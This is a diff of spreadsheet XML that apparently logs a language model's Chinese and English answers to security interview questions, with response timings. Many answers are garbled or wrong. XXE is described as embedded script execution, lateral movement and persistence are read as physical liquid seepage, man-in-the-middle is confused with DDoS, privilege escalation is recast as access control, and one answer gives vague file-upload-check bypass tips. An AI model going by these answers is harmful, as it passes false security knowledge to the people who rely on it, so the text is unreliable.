+SQL注入是指通过 inserted 语句中的用户提供的输入来执行SQL语句的攻击方式。通常，在Web应用程序中，用户可以输入需要执行的SQL语句，但是如果用户输入了可疑的或恶意的内容，那么这种攻击就可能会产生危害。
+SQL注入的危害主要来自于用户可以通过输入SQL语句来访问和修改数据库中的数据。如果用户可以访问和修改其他用户的数据，那么这可能会导致数据库的安全问题。此外，SQL注入还可以用于执行恶意的操作，如delete 操作可以 Delete 整个数据库中的数据，或者更改数据库的结构等。
+为了防止SQL注入，通常情况下会采用以下方法：
+1. 对用户输入的 validate：通过验证用户输入的内容，以确保它们是有效的和合法的SQL语句。
+2. 使用 parameterized queries：使用已编译好的SQL语句，而不是以用户输入来构造SQL语句。
+3. 使用prepared statements：使用特定的SQL语句，而不是以用户输入来构造SQL语句。
+4. 使用SQL安全措施：使用特定的SQL安全措施，如Limit 查询，防止攻击者访问整个数据库。
+5. 使用Firewall和安全检查：使用Firewall和安全检查来防止攻击者访问数据库。
+6. 使用数据库隐藏：使用数据库隐藏来隐藏数据库的存在和访问方式。
+7. 使用访问控制：使用访问控制来限制用户访问数据库的权限。
+8. 使用数据库访问控制：使用数据库访问控制来限制用户访问数据库中的具体数据。
+总之，防止SQL注入需要在Web应用程序中采用多种方法，包括验证用户输入、使用parameterized queries、使用prepared statements、使用SQL安全措施、使用Firewall和安全检查、使用数据库隐藏、使用访问控制和数据库访问控制等。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D32" t="n">
-        <v>4.949476480484009</v>
+        <v>16.96151542663574</v>
       </c>
     </row>
     <row r="33">
@@ -1151,12 +1327,16 @@
       <c r="C33" t="inlineStr">
         <is>
           <t>？
-CSRF（Cross-Site Request Forgery）是一种在互联网上的攻击方式，通过让用户 clicking 或 Enter 键操作，触发一个人为的 HTTP 请求，从而冒充用户的身份进行恶意操作。
-在 CSRF 攻击中，攻击者需要在用户的域名下创建一个可以被访问的 URL，例如一个 HTML 脚本。当用户访问这个 URL 时，它会自动发送一个 HTTP 请求，例如提交一个Form 表单。因此，如果攻击者可以控制这个 URL，他就可以让用户的身份进行恶意操作，例如透明提交一个购物订单，或者取消一个预约。</t>
+CSRF（Cross-Site Request Forgery）是一种Web攻击，通过模拟用户的动作，让用户未经授权的访问和修改某个网站或应用程序的数据。
+CSRF攻击的原理是利用Web端的POST请求方法，即使用户没有在浏览器中点击相应的按钮，但是可以通过模拟用户的动作，向Web端发送POST请求，达到模拟用户的操作效果。
+在CSRF攻击中，攻击者需要知道目标Web站点的响应式URL，并在浏览器中模拟用户的POST请求，将请求数据包含在HTML Form上。当用户在浏览器中点击相应的按钮时，Web端会将请求数据包含在POST请求中，并将其发送到服务器进行处理。
+因此，CSRF攻击可以使用用户未经授权的POST请求来修改、删除或添加数据，从而让用户未经授权地执行某些操作。
+为了防止CSRF攻击，一般会在Web应用程序中添加一个token或nonce，这个 token 或nonce 将会在每次请求时包含在请求头中，以便在Web端接收到请求时，可以检查是否是从用户的浏览器发送的请求，而不是从攻击者的浏览器。如果检查到不同的token 或nonce ，则认为是攻击者的请求，并拒绝其。
+总之，CSRF原理是利用Web端的POST请求方法，模拟用户的动作，让用户未经授权的访问和修改某个网站或应用程序的数据。为了防止CSRF攻击，可以添加token或nonce，并在Web端接收到请求时检查其来确保来自用户的请求。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D33" t="n">
-        <v>5.105468988418579</v>
+        <v>14.27388763427734</v>
       </c>
     </row>
     <row r="34">
@@ -1171,14 +1351,13 @@
       <c r="C34" t="inlineStr">
         <is>
           <t>？
-逻辑漏洞是指在一个逻辑思维或逻辑分析中存在的误解或错误，导致人们的思维或分析结论不准确。逻辑漏洞可以出现在不同领域，包括计算机科学、数学、哲学、诗歌等。
-以下是一些常见的逻辑漏洞：
-1. 逻辑缺陷：指的是人们在思维或分析中缺乏逻辑的检查和约束，导致错误的结论或解释。
-2. 谬误逻辑：指的是人们在思维或</t>
+逻辑漏洞是指在一个逻辑系统中存在的一些错误或不准确的处理方式，导致系统的决策或行动不当。逻辑漏洞可以是词义漏洞、逻辑逻辑漏洞、假设漏洞等，其中词义漏洞是指系统不能准确地理解用户的需求或意图，逻辑逻辑漏洞是指系统中的逻辑不准确或不完整，而假设漏洞是指系统假设了一些不存在的实际或情况。
+逻辑漏洞的出现可以是由于各种因素，如人工智能算法的不善、数据质量不佳、系统的设计或实现不具备、用户 Input 的不准确等。在实际应用中，逻辑漏洞可能会导致系统做出不良决策或行动，如预测模型的误判、自动驾驶车的冒泡、智能助手的错误提示等。
+为了避免逻辑漏洞的出现，开发人员可以采取一些措施，如对数据进行严格的验证和检查、使用多种逻辑检查工具、实现可靠的逻辑学习算法等。同时，在实际应用中，人工智能系统还需要根据用户反馈和实际评估来不断地进行改进和优化。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D34" t="n">
-        <v>4.984219789505005</v>
+        <v>12.90464925765991</v>
       </c>
     </row>
     <row r="35">
@@ -1193,14 +1372,22 @@
       <c r="C35" t="inlineStr">
         <is>
           <t>？
-逻辑漏洞是指在逻辑处理中出现的错误或不完善，导致逻辑结论不正确的地方。以下是一些常见的逻辑漏洞：
-1. 谬误论证：这是一种常见的逻辑漏洞，即在论证中使用了不具逻辑性的证据或推论。
-2. 逻辑循环：逻辑循环是指在逻辑处理中，一个逻辑结论引入了另一个逻辑结论，并且这两个结论之间存在直接关系。
-3. ��</t>
+逻辑漏洞是指在逻辑、计算机科学、数学等领域中存在的错误或缺陷。以下是一些常见的逻辑漏洞：
+1. 误解逻辑：在逻辑学中，人们常常误解逻辑语言，导致错误的解释和应用。
+2. 非 sequitur：指一个结论不是从前面的论据 logical consequence。
+3. 矛盾：一个人可能会做出矛盾的论断或判断，例如说一个人可能会认为，一个事物是正确的，但是又认为它的反面也是正确的。
+4. 偏见：偏见是一种不正确的思维方式，它是基于个人的偏好或习惯而非对话的结论。
+5. 逻辑犹豫：指一个人不能够做出明确的逻辑性的判断或论断，常常会出现在複雜的问题中。
+6. 欺诈：欺诈是一种不正确的思维方式，它是通过隐瞒或捏造信息来诱导人们的结论。
+7. 误解历史：误解历史是指不正确地理解历史事件或人物的思维方式。
+8. 误解数学：误解数学是指不正确地理解数学概念或结论的思维方式。
+9. 误解科学：误解科学是指不正确地理解科学理论或研究结果的思维方式。
+10. 逻辑疲劳：逻辑疲劳是指在解释或应用逻辑知识时感受到的疲劳或困难。
+这些逻辑漏洞都可以影响人们在逻辑、计算机科学、数学等领域中的思考和决策能力。了解和了解逻辑漏洞的常见形式可以帮助人们更好地理解和应用逻辑知识。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D35" t="n">
-        <v>4.986861944198608</v>
+        <v>18.35255408287048</v>
       </c>
     </row>
     <row r="36">
@@ -1214,14 +1401,19 @@
       </c>
       <c r="C36" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-文件上传检查是一个常见的安全 mesure，用于防止恶意文件上传。但是，这个功能可能会对正常的文件上传造成阻碍。为了绕过文件上传检查，可以考虑以下几种方法：
-1. 使用文件名来绕过检查：可以将文件名发送到服务器，而不是将文件本身发送。这样服务器只需要根据文件名来检查文件，而不是将整个文件上传。
-2. 使用base64编码：可以将文件编码为base64，然后将编码后的文件名发送到服务器。这样服务器只需要根据base64编码的文件名来检查文件，而不是将整个文件上传</t>
+          <t>？
+文件上传检查功能是一个常见的安全measure，用于防止恶意文件或恶意程序在文件上传。但是有时候，你可能需要绕过这个功能，例如，你想要上传一个具有某些特定结构的文件，但是这个文件无法通过文件上传检查功能。
+以下是一些可能的绕过方法：
+1. 使用 Base64 编码：将文件 Base64 编码后，将其作为字符串上传。这样，文件上传检查功能不会检查文件的内容，而是只会检查文件的长度和MD5 hash。
+2. 使用分割上传：将大文件分割成多个小文件，然后将每个小文件上传。这样，文件上传检查功能只需要检查每个小文件的内容，而不是整个大文件。
+3. 使用隐藏文件：将文件嵌入到一个隐藏文件中，然后上传这个隐藏文件。文件上传检查功能可能不会检查隐藏文件的内容，因此可以绕过这个功能。
+4. 使用掩码：使用一个掩码文件来掩住文件的内容。然后，将掩码文件上传，文件上传检查功能可能不会检查掩码文件的内容，因此可以绕过这个功能。
+5. 使用数据 URI：将文件 converted to a data URI，然后上传这个 data URI。文件上传检查功能可能不会检查数据 URI 的内容，因此可以绕过这个功能。
+需要注意的是，绕过文件上传检查功能可能会导致安全问题，因此你应该仅在确实需要时使用这些绕过方法。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D36" t="n">
-        <v>4.98804497718811</v>
+        <v>14.44737529754639</v>
       </c>
     </row>
     <row r="37">
@@ -1236,14 +1428,14 @@
       <c r="C37" t="inlineStr">
         <is>
           <t>？
-在 aviation industry， there are two types of airspace:  horizontal airspace and vertical airspace. Horizontal airspace refers to the airspace above the Earth's surface, while vertical airspace refers to the airspace above the Earth's surface at a specific altitude.
-Horizontal airspace is divided into several classes, including Class A, B, C, D, and E. Each class has different rules and regulations for aircraft operations, including altitude restrictions, air traffic control requirements, and restricted areas.
-Vertical airspace, on the other hand, is divided into three classes: Class A, B, and C. Class A vertical airspace is defined as the airspace above 18,000 feet MSL (mean sea level), while Class B vertical airspace is defined as the airspace above 12,000 feet MSL up to 18,000 feet MSL. Class C vertical airspace is defined as the airspace above 2,500 feet MSL up to 12,000 feet MSL.
-The main difference between horizontal and vertical airspace is the altitude at which aircraft operations are allowed.</t>
+ horizontal and vertical rights are two different concepts in the context of intellectual property law. Here are the key differences:
+Horizontal rights refer to the exclusive rights granted to an inventor or creator over their invention or work, in relation to the same field or industry. In other words, horizontal rights are concerned with the protection of a particular invention or work within a specific industry or market. For example, a patent holder for a new type of smartphone technology may have horizontal rights over their invention, preventing others from making or selling similar smartphones in the same market.
+Vertical rights, on the other hand, refer to the exclusive rights granted to an inventor or creator over their invention or work, in relation to different fields or industries. In other words, vertical rights are concerned with the protection of a particular invention or work across different markets or industries. For example, a patent holder for a new type of medical device may have vertical rights over their invention, preventing others from making or selling similar devices in different medical fields.
+In summary, horizontal rights focus on protecting a single invention or work within a specific industry or market, while vertical rights focus on protecting the same invention or work across different industries or markets. Both types of rights are important in the context of intellectual property law, as they help to ensure that inventors and creators are fairly compensated for their innovations and creations.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D37" t="n">
-        <v>5.042893886566162</v>
+        <v>7.491214275360107</v>
       </c>
     </row>
     <row r="38">
@@ -1257,17 +1449,15 @@
       </c>
       <c r="C38" t="inlineStr">
         <is>
-          <t>？
-================
-XXE 是指 XML External Entity 的缩写，它是一种在 XML 文档中引入外部资源的方式。但是，XXE 漏洞也是一种常见的安全漏洞，可能会允许攻击者在 XML 文档中引入非法资源，从而触发敏感软件。
-在本教程中，我们将详细介绍 XXE 漏洞的概念、攻击方式和防范方法。
-XXE 漏洞的概念
---------------------
-XXE 漏洞是指在 XML 文档中使用 external entity 来引入外部资源，而这些资源可能包含敏感信息或恶意代码。</t>
+          <t>？XXE是什么？
+XXE是一种漏洞，它通过解析XML字符串中嵌入的脚本来执行外部命令。这种漏洞可能会让攻击者通过访问受影响的系统的 XML 数据来执行外部命令。
+XXE 漏洞的名称来源于"XML External Entity"，即 XML 外部实体。它是指 XML 文档中嵌入的脚本，可以是 JavaScript、Python 等语言的代码。这些脚本可以在受影响的系统中执行，从而执行敏感操作。
+XXE 漏洞可以通过多种方式进行攻击，其中一种常见的方式是在 XML 文档中嵌入 malicious 脚本，并通过访问受影响的系统的 XML 数据来执行这些脚本。这种攻击方式可以允许攻击者访问和修改数据，以及执行敏感操作。
+为了防止 XXE 漏洞，建议优化系统的 XML 处理规范，限制外部脚本的执行，并在受影响的系统中启用安全扩展名（SAX）Parser，它可以更好地esian 处理 XML 数据，避免执行脚本。此外，还可以通过在系统中启用 Content Security Policy（CSP）来限制脚本的执行，从而防止攻击者在受影响的系统中执行 malicious 脚本。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D38" t="n">
-        <v>5.03227972984314</v>
+        <v>12.86815071105957</v>
       </c>
     </row>
     <row r="39">
@@ -1282,16 +1472,22 @@
       <c r="C39" t="inlineStr">
         <is>
           <t>？
-有哪些操作系统提权方式？以下是一些常见的操作系统提权方式：
-1. Microsoft Windows：Windows提供了多种提权方式，包括：
-* Windows 10 Home：只允许使用者更改系统的外观和个性化设置，但不允许更改系统的基本配置和安全设置。
-* Windows 10 Pro：允许使用者更改系统的外观和个性化设置，以及更改系统的基本配置和安全设置。
-* Windows 10 Enterprise：针对大型企业和组织提供了较多的提权功能，包括多位用户管理、对象管理、策略管理等。
-2. macOS：macOS 提供</t>
+有哪些操作系统提权方式？下面是一些常见的操作系统提权方式：
+1. 系统提权：这是最常见的操作系统提权方式，它让用户在系统中具有特定的权限和访问权限，以便在系统中进行管理和控制。
+2. 用户帐户 Control：这种方式让用户创建和管理自己的帐户，并将帐户分配给其他用户或组织，以便进行访问控制和安全管理。
+3. 角色分配：这种方式让用户被分配到角色，角色是一种用于描述用户的权限和责任的单元，用户可以根据角色的权限和责任来进行操作。
+4. 访问控制 List：这种方式让系统管理员可以将用户分配到不同的访问控制列表，以便控制用户在系统中的访问权限。
+5. 安全审批：这种方式让系统管理员可以对用户进行安全审批，以确保用户的操作符合系统的安全政策。
+6. 访问控制 Policy：这种方式让系统管理员可以定义和应用访问控制策略，以便控制用户在系统中的访问权限。
+7. 身份验证：这种方式让用户进行身份验证，以确保用户的身份是安全的和可靠的。
+8. 授权：这种方式让系统管理员可以将授权授予给用户或组织，以便控制用户在系统中的操作。
+9. 权限管理：这种方式让系统管理员可以管理用户的权限，以确保用户只能在系统中进行访问和操作他们应有的权限。
+10. 安全评估：这种方式让系统管理员可以对用户进行安全评估，以确保用户的操作符合系统的安全政策。
+这些操作系统提权方式都可以帮助系统管理员更好地控制和管理系统的访问和操作，从而提高系统的安全性和可靠性。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D39" t="n">
-        <v>5.031474590301514</v>
+        <v>18.83731293678284</v>
       </c>
     </row>
     <row r="40">
@@ -1306,14 +1502,21 @@
       <c r="C40" t="inlineStr">
         <is>
           <t>？
-做代码混淆可以帮助您降低代码泛影，提高代码质量和可维护性。以下是一些常用的代码混淆技术和工具：
-1. 函数名重命名：重命名函数名以帮助隐藏函数的实现细节。例如，将函数 `compute_result` 重命名为 `get_result`，以隐藏它的实现细节。
-2. 变量命名重命名：重命名变量名以帮助隐藏它的值。例如，将变量 `result` 重命名为 `computed_result`，以隐藏它的值。
-3. 接口重命名：重命名接口名以帮助隐藏它的实现细节。</t>
+混淆是指将代码分成多个块，每个块都可以被编译成不同的类型的代码，例如扩展程序、库或者核心。这种方法可以帮助开发人员更好地组织代码，减少代码的依赖性和复杂性，同时也可以帮助开发人员更好地管理代码的质量。
+在做代码混淆之前，需要做好以下准备：
+1. 理解混淆工具：需要了解一些常用的混淆工具，例如：Eclipse的AspectJ、NetBeans的AspectJ、IntelliJ IDEA的AspectJ等。这些工具可以帮助开发人员更好地编译和管理混淆代码。
+2. 准备代码：需要将代码分成多个块，每个块都可以被编译成不同的类型的代码。这些块可以根据需要进行组织和命名，以便于后续的混淆编译和管理。
+3. 配置混淆工具：需要根据不同的混淆工具进行配置，以便于其能够正确地处理和混淆代码。这可能包括 configuring build paths、setting classpath、setting sourcepath等。
+4. 编译和混淆代码：需要使用混淆工具来编译和混淆代码，这可能包括以下步骤：
+a. 编译代码：需要使用混淆工具来编译代码，以便于其能够正确地处理和混淆代码。
+b. 混淆代码：需要使用混淆工具来混淆代码，以便于其能够正确地生成混淆代码。
+c. 分析混淆代码：需要使用混淆工具来分析混淆代码，以便于其能够正确地生成混淆代码。
+5. 管理混淆代码：需要根据不同的混淆工具进行管理，以便于其能够正确地处理和管理混淆代码。这可能包括管理混淆代码的包含和依赖关系、管理混淆代码的编译和混淆等。
+总之，做代码混淆需要了解混淆工具和其配置、编译和混淆代码、管理混淆代码等。通过使用混淆工具，开发人员可以更好地组织代码，减少代码的依赖性和复杂性，同时也可以帮助开发人员更好地管理代码的质量。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D40" t="n">
-        <v>5.032963037490845</v>
+        <v>23.43793249130249</v>
       </c>
     </row>
     <row r="41">
@@ -1327,15 +1530,23 @@
       </c>
       <c r="C41" t="inlineStr">
         <is>
-          <t>测试
-免杀测试（Test-Driven Development，TDD）是一种测试驱动的开发方法，它的基本思想是在开发过程中先写测试用例，然后根据测试用例进行开发，最后运行测试来验证代码是否正确。在免杀测试中，我们会在开发过程中遇到一些问题，这些问题可能是测试用例无法验证代码的情况，或者代码无法满足测试用例的要求。在这种情况下，我们需要使用免杀测试来识别和解决问题。
-以下是一些常见的免杀测试技巧：
-1. 使用 mock 对象
-在免杀测试中，我们</t>
+          <t>，能够让测试人员不感觉到压力和疲劳，保持见解和质量？  
+在测试过程中，许多测试人员会感到压力和疲劳，这种情况通常叫做“测试剧症”。为了避免这种情况，我们可以采取以下措施：
+1. 明确测试目标：明确测试的目标和要求，以帮助测试人员更好地了解测试的意义和目的。
+2. 采用适度的测试步骤：逐步增加测试步骤的难度和规模，以帮助测试人员逐渐演练和提高自己的技能。
+3. 增加测试范围：逐渐扩大测试范围，以增加测试人员的经验和技能。
+4. 采用不同的测试方法：采用不同的测试方法，如manual testing、automated testing、hybrid testing等，以增加测试的多样性和复杂性。
+5. 提供testing资源：提供testing资源，如testing框架、testing工具、testing文档等，以帮助测试人员更好地完成测试任务。
+6. 增加测试评估和答案评估：增加测试评估和答案评估，以帮助测试人员更好地评估测试结果和测试步骤。
+7. 增加测试时间：增加测试时间，以帮助测试人员更好地了解测试的进度和结果。
+8. 增加测试人员的合作和沟通：增加测试人员的合作和沟通，以帮助测试人员更好地完成测试任务和协作。
+9. 提供测试人员的支持和评价：提供测试人员的支持和评价，以帮助他们更好地完成测试任务和协作。
+10. 增加测试的娱乐性：增加测试的娱乐性，以帮助测试人员更好地完成测试任务和产生质量。
+通过采取以上措施，可以帮助测试人员快速适应测试任务，提高测试效率和质量，并减少测试剧症的影响。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D41" t="n">
-        <v>5.058534622192383</v>
+        <v>20.3531129360199</v>
       </c>
     </row>
     <row r="42">
@@ -1349,14 +1560,20 @@
       </c>
       <c r="C42" t="inlineStr">
         <is>
-          <t>？ - Gold and Silver Tickets Explained
-Gold and silver tickets are a type of financial instrument that represents ownership of a certain amount of gold or silver. They are similar to stocks or bonds, but instead of representing ownership in a company or government, they represent ownership in a specific amount of gold or silver.
-Gold tickets, also known as gold-backed tickets, are backed by physical gold stored in a vault. The ticket represents a specific amount of gold, such as 1 gram, 1 oz, or 1 kg, and can be exchanged for physical gold at any time. Gold tickets are often used as a safe-haven asset, as the value of gold is often seen as a hedge against inflation, currency fluctuations, and geopolitical risks.
-Silver tickets, on the other hand, are backed by physical silver stored in a vault. Like gold tickets, silver tickets represent a specific amount of silver, such as 1 gram, 1 oz, or 1 kg, and can be exchanged for physical silver at any time. Silver tickets are also used as a safe</t>
+          <t>和银票据？
+What are golden ticket, silver ticket, and silver-plated ticket?
+Golden ticket, silver ticket, and silver-plated ticket are different types of tickets used in various industries. Here's a brief overview of each:
+1. Golden Ticket:
+A golden ticket is a special type of ticket that offers the holder access to exclusive benefits or privileges. In the entertainment industry, golden tickets are often used to reward loyal customers or fans with premium experiences, such as backstage tours or meet-and-greets with celebrities. In the travel industry, golden tickets may provide access to luxury accommodations or exclusive travel packages.
+2. Silver Ticket:
+A silver ticket is a type of ticket that offers a lower level of access or benefits compared to a golden ticket. In the entertainment industry, silver tickets may provide access to general admission or standard seating at a concert or event. In the travel industry, silver tickets may offer discounted rates on flights or accommodations.
+3. Silver-Plated Ticket:
+A silver-plated ticket is a type of ticket that is not as valuable or exclusive as a golden ticket, but still offers some benefits or privileges. In the entertainment industry, silver-plated tickets may provide access to VIP areas or events, but not the same level of access as a golden ticket. In the travel industry, silver-plated tickets may offer discounts or perks, but not as extensive as those offered by a silver ticket.
+In summary, the main difference between golden ticket, silver ticket, and silver-plated ticket is the level of exclusivity and access they offer. Golden tickets offer the most exclusive and premium experiences, followed by silver tickets, and then silver-plated tickets, which offer less exclusive benefits.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D42" t="n">
-        <v>5.027064085006714</v>
+        <v>9.840631008148193</v>
       </c>
     </row>
     <row r="43">
@@ -1371,13 +1588,20 @@
       <c r="C43" t="inlineStr">
         <is>
           <t>？
-横向渗透是指在某一个层次或个体中，物质从上层次或下层次渗透的过程。以下是一些常见的横向渗透手段：
-1. 静水压渗透：静水压渗透是指在一定压力下，水在层次之间的渗透。在这种情况下，水会通过缺陷的表面受力，从上层次渗透到下层次。
-2. 潮湿渗透：潮湿渗透是指在潮湿的环境中，水从上层次渗透到下层次。这种渗</t>
+横向渗透是指在柔软材料上通过渗透剂或液体的渗透过程，以实现某种效果或特点。下面是一些常见的横向渗透手段：
+1. 涂覆液剂：通过涂覆柔软材料的表面用液剂，实现横向渗透。这种方法可以控制渗透的速度和深度，同时也可以实现某些特殊效果。
+2. 渗透剂：通过添加渗透剂到液体中，可以提高液体的渗透性，从而实现横向渗透。渗透剂可以是 organic molecules、inorganic molecules 或nano particles。
+3. 热渗透：通过加热液体，使其具有更强的渗透性，从而实现横向渗透。这种方法可以在各种材料表面使用，包括柔软材料、塑料、塑料等。
+4. 气压渗透：通过加压液体，使其渗透到柔软材料表面。这种方法可以在各种材料表面使用，包括柔软材料、塑料、塑料等。
+5.  ultrasonic cleaning：通过 ultrasonic 洗涤，可以实现横向渗透。这种方法可以在各种材料表面使用，包括柔软材料、塑料、塑料等。
+6. 磁気渗透：通过磁场的影响，实现横向渗透。这种方法可以在各种材料表面使用，包括柔软材料、塑料、塑料等。
+7. 紫外渗透：通过紫外线的影响，实现横向渗透。这种方法可以在各种材料表面使用，包括柔软材料、塑料、塑料等。
+8. 激光渗透：通过激光的影响，实现横向渗透。这种方法可以在各种材料表面使用，包括柔软材料、塑料、塑料等。
+这些横向渗透手段可以根据具体情况和应用场景进行选择和组合，以实现不同的效果和特点。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D43" t="n">
-        <v>5.050751924514771</v>
+        <v>21.62320876121521</v>
       </c>
     </row>
     <row r="44">
@@ -1391,16 +1615,24 @@
       </c>
       <c r="C44" t="inlineStr">
         <is>
-          <t>？
-内网渗透可能会留下以下几种痕迹：
-1. 网络延迟：内网渗透可能会导致网络延迟，因为内部网络资源被占用，导致网络响应衰ь。
-2. 网络泄露：内网渗透可能会导致网络泄露，因为内部网络资源被访问，导致网络安全漏洞。
-3. 系统崩溃：内网渗透可能会导致系统崩溃，因为内部网络资源被占用，导致系统无法正常运行。
-4. 数据</t>
+          <t>？  
+Internal network intrusion can leave behind what kind of traces?
+Well, the traces of internal network intrusion can vary depending on the severity and nature of the intrusion. Here are some common types of traces that an intruder may leave behind:
+1. Log files: An intruder may create log entries in the system logs, which can provide valuable information about the intruder's activities, including the dates and times of access, the IP addresses of the compromised machines, and the commands executed.
+2. System configuration changes: An intruder may modify system configuration settings, such as the firewall rules, network settings, or user accounts, to gain unauthorized access to the network. These changes may be detected by comparing the current system configuration with a known good configuration.
+3. Data tampering: An intruder may modify or delete sensitive data, such as financial information, personal identifiable information, or intellectual property. Forensic analysis of the affected systems can help identify the types of data that have been altered or deleted.
+4. Network traffic analysis: Analyzing network traffic patterns can reveal the presence of an intruder, including the types of traffic generated by the intruder, such as login attempts, file transfers, or command and control (C2) traffic.
+5. User behavior analysis: Monitoring user behavior can help identify potential intruders, such as abnormal login activity, unusual file access, or sudden changes in user behavior.
+6. Malware presence: An intruder may leave behind malware, such as viruses, trojans, or rootkits, which can be detected through various methods, including antivirus software, memory scanning, or system scanning.
+7. Network reconnaissance: An intruder may perform network reconnaissance activities, such as scanning for open ports, services, or vulnerabilities, which can provide valuable information about the target network.
+8. Data exfiltration: An intruder may extract sensitive data from the network, which can be detected through various methods, including network monitoring, log analysis, or data loss prevention (DLP) tools.
+9. Network segmentation: An intruder may attempt to exploit vulnerabilities in isolated segments of the network, which can provide insight into the intruder's tactics, techniques, and procedures (TTPs).
+10. Insider threat indicators: Internal intruders may leave behind indicators of their activities, such as unapproved software installations, unusual access to sensitive data, or changes to system settings that are not typical of legitimate users.
+These are just some of the common traces of internal network intrusion that can be detected through forensic analysis. The specific traces left behind will depend on the nature of the intrusion and the tactics used by the intruder.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D44" t="n">
-        <v>5.033491611480713</v>
+        <v>14.7219352722168</v>
       </c>
     </row>
     <row r="45">
@@ -1415,13 +1647,20 @@
       <c r="C45" t="inlineStr">
         <is>
           <t>？
-在渗透过程中，我们需要保证数据的持久化，以确保在它们恢复时它们能够正确地恢复。这些数据可能包括渗透结果、渗透率、渗透时间等。以下是一些可以使用的持久化方法：
-1. 使用文件系统：可以将渗透结果保存到文件系统中，例如 CSV 文件、JSON 文件等。这样可以使用文件系统的备份和恢复功能来保存和恢复数据。
-2. 使用数据库：可以将渗透结果保存到数据库中，例如 MySQL、PostgreSQL 等。这样可以使用数据库的备份和恢复功能来</t>
+在渗透过程中，渗透物质会随着时间的推移而掺拌到固体材料中。这个过程可以通过一些方式来实现持久化。以下是一些可能有用的方法：
+1. 使用气囊：可以将渗透物质固定在气囊中，从而避免它们与固体材料掺拌。
+2. 使用绝缘层：可以在渗透物质和固体材料之间增加一层绝缘层，从而防止渗透物质与固体材料直接接触。
+3. 使用气囊底弹：可以将渗透物质固定在气囊中，并将气囊底部压缩，从而防止渗透物质从气囊中掺拌到固体材料中。
+4. 使用吸附剂：可以在渗透物质和固体材料之间添加一种吸附剂，从而吸附渗透物质，从而防止它们与固体材料掺拌。
+5. 使用渗透剂：可以将渗透物质替换为一种渗透剂，该剂可以帮助渗透物质快速掺拌到固体材料中，从而避免渗透物质与固体材料之间的掺拌。
+6. 使用气囊填充物：可以将渗透物质固定在气囊中，并将气囊填充一种材料，以防止渗透物质与固体材料之间的掺拌。
+7. 使用气囊底部约束：可以将渗透物质固定在气囊中，并将气囊底部约束，从而防止渗透物质从气囊中掺拌到固体材料中。
+8. 使用渗透剂涂层：可以将渗透剂涂抹到固体材料表面，以便渗透物质快速掺拌到固体材料中。
+这些方法可以单独使用，也可以组合使用，以实现持久化。需要注意的是，每种方法都有其特点和缺点，需要根据具体情况进行选择和评估。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D45" t="n">
-        <v>5.038685083389282</v>
+        <v>23.2457709312439</v>
       </c>
     </row>
     <row r="46">
@@ -1436,13 +1675,16 @@
       <c r="C46" t="inlineStr">
         <is>
           <t>？
-鱼叉攻击和钓鱼攻击都是指攻击他人的计算机系统或网络，但它们之间有一些区别。
-鱼叉攻击是指在网络上找到一个可以进行攻击的缺陷，然后利用这个缺陷来访问受影响的系统或网络。这种攻击通常需要技术知识和特殊软件，可以使攻击者获得访问权限或者进行恶意操作。
-钓鱼攻击是指利用电子邮件或者其他电子渠道散布恶意链接或者文件，让受影响的用户</t>
+鱼叉攻击和钓鱼攻击都是指攻击人类或其他生物，但是它们之间有一些区别。
+鱼叉攻击是指用某种方式攻击或威胁人类，以达到某种目的，常常是为了获取某种利益或者损害对手。例如，黑mail攻击、跟踪攻击、恶意软件攻击等。
+钓鱼攻击是指用某种方式欺骗或欺负人类，以达到某种目的，常常是为了获取某种利益或者损害对手。例如，骗掉钱的攻击、诈骗攻击、诱拐攻击等。
+区别在于，鱼叉攻击通常是指通过某种技术或方式对人类进行攻击，而钓鱼攻击通常是指通过谎言或欺骗的方式对人类进行攻击。
+例如，鱼叉攻击可能是通过破坏网站或者病毒攻击，而钓鱼攻击可能是通过诈骗或者欺骗来捞取钱或者个人信息。
+总之，鱼叉攻击和钓鱼攻击都是指攻击人类，但是它们之间的方式、目的和影响不同，因此应该在具体情况下进行区别和识别。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D46" t="n">
-        <v>5.036012649536133</v>
+        <v>13.22514367103577</v>
       </c>
     </row>
     <row r="47">
@@ -1457,13 +1699,19 @@
       <c r="C47" t="inlineStr">
         <is>
           <t>？
-中间人攻击是指在一个社交媒体平台上，一个用户通过分享或回复一则帖子，引发其他用户的攻击或评论，以达到自己的目的或利益。
-通常，中间人攻击的目的是为了攻击或诋毁受到攻击的用户，或者为了阻碍受到攻击的用户与其他用户的交流。这类攻击可能包括侮辱、诋毁、诋毁、威胁等。
-中间人攻击的情况可能会导致受到攻击的用户感到受到困扰、痛苦、沮丧或恐</t>
+Intermediate attack means an attack that is launched by a third party against a target, often with the intention of disrupting or gaining control of the target. This type of attack is more sophisticated than a basic distributed denial-of-service (DDoS) attack, as it can be launched from multiple sources and can use various techniques to evade detection. Intermediate attacks are often launched by organized crime groups or nation-states, and can have significant impact on the target's operations and reputation.
+Here are some common types of intermediate attacks:
+1. Botnet attacks: These are attacks where a hacker uses a network of compromised computers to launch a large volume of traffic against a target. Botnets can be used to overwhelm a website or network with traffic, making it difficult or impossible to access.
+2. Reflective attacks: These are attacks where a hacker uses a third party's network or resources to launch an attack against a target. Reflective attacks can be difficult to detect, as the traffic appears to be coming from legitimate sources.
+3. Amplification attacks: These are attacks where a hacker uses a third party's network or resources to amplify the traffic being sent against a target. Amplification attacks can be used to overwhelm a target with traffic, making it difficult or impossible to access.
+4. DNS amplification attacks: These are attacks where a hacker uses a third party's network or resources to launch a DNS amplification attack against a target. DNS amplification attacks can be used to overwhelm a target with traffic, making it difficult or impossible to access.
+5. Naming service attacks: These are attacks where a hacker uses a third party's network or resources to launch a naming service attack against a target. Naming service attacks can be used to disrupt a target's operations by manipulating the target's DNS records.
